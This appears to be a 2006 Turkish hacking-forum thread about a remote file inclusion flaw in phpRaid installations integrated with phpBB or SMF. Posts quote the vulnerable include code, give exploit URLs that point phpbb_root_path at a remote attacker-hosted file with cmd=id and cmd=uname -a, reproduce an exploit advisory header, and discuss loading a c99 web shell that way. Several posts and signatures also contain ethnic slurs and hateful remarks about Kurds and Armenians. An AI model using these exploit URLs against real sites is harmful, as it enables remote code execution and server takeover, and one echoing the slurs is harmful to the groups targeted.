folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder # SMF # Sitesi Olanlar Kapatın Exploit Çıktı !!!!



# SMF # Sitesi Olanlar Kapatın Exploit Çıktı !!!!

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hitbaytar
    hitbaytar's avatar
    Kayıt Tarihi: 28/Eylül/2005
    Erkek
    phpraid denen nane yardımıyla hack oluyo gibi geldi bana.önce phprain in dizinini bulmak lazım yani
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hitbaytar
    hitbaytar's avatar
    Kayıt Tarihi: 28/Eylül/2005
    Erkek
    arkadaşlar acık phpraid de bakın phpraid warsa

    phpbb de hacklenebilio

    # cmd shell example:
    # cmd shell variable: ($_GET[cmd]);

    Vulnerable code : At first for phpbb portal :)

    // define our auth type
    define("AUTH","phpbb");

    // database connection
    global $user_group_table;
    $user_group_table = $phpbb_prefix . "user_group";

    // setup phpBB user integration
    define('IN_PHPBB', true);

    // set this as the path to your phpBB installation
    include($phpbb_root_path . 'extension.inc');
    include($phpbb_root_path . 'common.'.$phpEx);

    -----------------------------------------------------------------

    http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt
    ?&cmd=id

    http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.t
    xt?&cmd=uname -a
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hitbaytar
    hitbaytar's avatar
    Kayıt Tarihi: 28/Eylül/2005
    Erkek
    Ayrıca Acıgın Kürtler Tarafından bulundugu söylenio:

    Details: ExploitAlert
    Topic : phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities

    ExploitAlert Id : 587

    Credit : botan@linuxmail.org

    Date : 10.5.2006

    Exploit Code :

    # Kurdish Security Advisory
    # phpRaid Remote File Include [PHPBB/SMF] :}
    # "Sosyalizim"de .srar insan olmakta .srard.r" Abdullah Ocalan
    # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com &
    botan@linuxmail.org
    -----------------------

    A.g kürtlere bak.Adam olmuslarda acık buluolar:D
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    alacakaranlik
    alacakaranlik's avatar
    Kayıt Tarihi: 29/Temmuz/2005
    Erkek
    kürtler sadece milworm exploit bölümüne kodları değişecek kendi düzenlerıyle ekledirler ondan dolayı exploitte bu şekil karşılaşıyorsun bunalr Ruslardan aldılar düzenlediler 1 tane daha var oda yayınlanacak ...

    eskilerden kim kaldı..
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    alacakaranlik
    alacakaranlik's avatar
    Kayıt Tarihi: 29/Temmuz/2005
    Erkek
    pc de sorun var açtığım konular 2 kere açılıyor kussura bakmayın arkadaşlar bu yazıda yukardakının aynısıydı belirtmek istedim

    eskilerden kim kaldı..
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hitbaytar
    hitbaytar's avatar
    Kayıt Tarihi: 28/Eylül/2005
    Erkek
    ama acık smf de deil görüldügü gibi phpraid adlı içerik yönetim portalında.Yani bu portala smf yi yada phpbb yi entegre ettiyseniz hemen iptal edin:D
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MUBARIZ
    TorNaVida
    TorNaVida's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    # Kurdish Security Advisory
    # phpRaid Remote File Include [PHPBB/SMF] :}
    # "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan
    # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org

    # Script : phpRaid
    # Script Website : http://www.spiffyjr.com/
    # Version : phpRaid v2.9.5
    " v3.0.b1
    " v3.0.b2
    " v3.0.b3

    # Risk : High
    # Class : Remote
    # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D

    # w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)

    Bende bunu dicektim pc kasıyo sabahtan beri aq....

    Aq götleri bulmuş bu açığı...

    yourcode.txt------Buraya ne katacağız txt yani c99shell.txt yapı upload mı edelim o şekildemi kullanalım..

    47 ermeni köpeğini tek başına geberten KAHRAMAN TÜRK ŞEHİTİ MÜBARİZ İBRAHİMOV.
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hitbaytar
    hitbaytar's avatar
    Kayıt Tarihi: 28/Eylül/2005
    Erkek
    ewt shell adresi yazılacak oraya.Ama dediğim gibi phpraid kurulu olması lazım
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MUBARIZ
    TorNaVida
    TorNaVida's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    Bu açık yaş bi boqa yaramaz....

    47 ermeni köpeğini tek başına geberten KAHRAMAN TÜRK ŞEHİTİ MÜBARİZ İBRAHİMOV.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    serdar42
    serdar42's avatar
    Kayıt Tarihi: 20/Ağustos/2005
    Erkek
    fuck kiro team mis onlar ne boktan anlar siktirsinler a.q

    selam
Toplam Hit: 2936 Toplam Mesaj: 22